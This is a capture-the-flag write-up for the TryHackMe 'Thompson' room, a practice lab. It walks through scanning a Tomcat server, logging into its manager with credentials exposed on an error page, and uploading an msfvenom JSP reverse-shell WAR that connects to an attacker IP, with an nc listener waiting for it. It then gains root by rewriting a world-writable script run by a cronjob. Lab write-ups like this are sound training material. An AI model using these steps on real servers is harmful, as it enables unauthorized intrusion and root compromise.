Thompson is another beginner-friendly room on TryHackMe.com based on the exploitation of AJP (Apache JServ Protocol). If done right completing this room won’t take more than 15 to 20 minutes as it is pretty easy.
The first that we must do is run an nmap scan against the machine’s IP address in order to determine the various ports open on the machine.
└──╼ $nmap -A 10.10.94.207
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-20 22:27 IST
Nmap scan report for 10.10.94.207
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.99 seconds
We can see that on port 8080 Apache Tomcat is running which suggests we can try to access it via a web browser at
And there we land on the Apache Tomcat default page. We can try to access the Manager App as from there we can access Tomcat’s dashboard. But when we click on that link, it asks us for a username and password which we don’t know.
We can try some default credentials like
admin:admin or any other but they don't work. But when we click on the cancel button it leads us to an unauthorized access error page.
And on the same page, we can find the username and password which we can use to access the application manager.
Now, we have access to the application manager. One thing to note is that in the application manager we have an option to upload a WAR file. So, we can create a custom payload using
msfvenom, upload it on the server and gain a reverse shell to the machine.
We can search on the internet beforehand to be sure that this method works. One such article can be found here. So, now we can move ahead and create a payload using
└──╼ $msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f war > shell.war
Payload size: 1094 bytes
Final size of war file: 1094 bytes
This command basically creates a reverse shell payload with the local host IP address and local port on which it should connect, and stores it in a
-p: Determine the payload that is to be used
-f: Determine the output file type
LHOST: IP where the victim machine should connect (Attacker’s IP address)
LPORT: Port on which the victim machine should connect (Where attacker would be listening)
Now, we can upload this war file through the application manager.
Once uploaded, we can access this file at
<ip_address>:8080/shell. Note that before accessing the file, start a listener on the attacker machine using the command
nc -nvlp 4444. And as soon as the file has been accessed we get a reverse shell on our attacker machine:
└──╼ $nc -nvlp 4444
listening on [any] 4444 ...
connect to [<attacker_ip>] from (UNKNOWN) [10.10.94.207] 33530
Now, we can move around and look for the user flag in the
drwxr-xr-x 3 root root 4096 Aug 14 2019 .
drwxr-xr-x 22 root root 4096 Aug 14 2019 ..
drwxr-xr-x 4 jack jack 4096 Aug 23 2019 jack
drwxr-xr-x 4 jack jack 4096 Aug 23 2019 .
drwxr-xr-x 3 root root 4096 Aug 14 2019 ..
-rw------- 1 root root 1476 Aug 14 2019 .bash_history
-rw-r--r-- 1 jack jack 220 Aug 14 2019 .bash_logout
-rw-r--r-- 1 jack jack 3771 Aug 14 2019 .bashrc
drwx------ 2 jack jack 4096 Aug 14 2019 .cache
-rwxrwxrwx 1 jack jack 26 Aug 14 2019 id.sh
drwxrwxr-x 2 jack jack 4096 Aug 14 2019 .nano
-rw-r--r-- 1 jack jack 655 Aug 14 2019 .profile
-rw-r--r-- 1 jack jack 0 Aug 14 2019 .sudo_as_admin_successful
-rw-r--r-- 1 root root 39 Nov 20 09:39 test.txt
-rw-rw-r-- 1 jack jack 33 Aug 14 2019 user.txt
-rw-r--r-- 1 root root 183 Aug 14 2019 .wget-hsts
And there we get the user flag.
The next task is to obtain the root flag. Also, in user jack’s directory, we can see an executable file
id.sh. We can try to check what is its function as it appears to be a bit suspicious.
id > test.txt
It appears that it read the
id and writes it down to a file named
test.txt. This text file is also present in jack's directory, so we can read it and get to know what user privilege this shell script is being executed.
uid=0(root) gid=0(root) groups=0(root)
The content of
text.txt makes it clear that this script is being executed with
root privileges. So, all we need to do is modify the content of
id.sh to read the root flag and write it down to
test.txt. This can be done using a simple
cat /root/root.txt > text.txt" > id.sh
cat /root/root.txt > text.txt
Now, as this is being run by a cronjob we must wait for some time and read the
test.txt file to get out root flag.
- TryHackMe-Thompson: https://tryhackme.com/room/bsidesgtthompson
- Exploiting Tomcat Manager: https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/
Do check out my other work and write-ups at https://github.com/0xNirvana